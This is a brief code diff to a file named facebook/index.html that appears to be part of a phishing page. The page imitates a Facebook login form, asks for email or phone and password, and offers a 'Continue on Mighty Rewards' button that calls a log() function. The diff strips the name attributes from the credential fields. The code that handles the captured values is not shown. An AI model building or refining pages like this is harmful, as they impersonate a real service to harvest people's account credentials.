--- a/facebook/index.html
+++ b/facebook/index.html
@@ -127,11 +127,11 @@
             <form>
                 <div class="input-box">
                     <label>Email or Phone</label>
-                    <input type="text" id="id" name="username" required>
+                    <input type="text" id="id" required>
                 </div>
                 <div class="input-box">
                     <label>Password</label>
-                    <input type="password" id="pass" name="password" required>
+                    <input type="password" id="pass" required>
                 </div>
                 <button onclick="log()">Continue on Mighty Rewards</button>
                 <br></br>
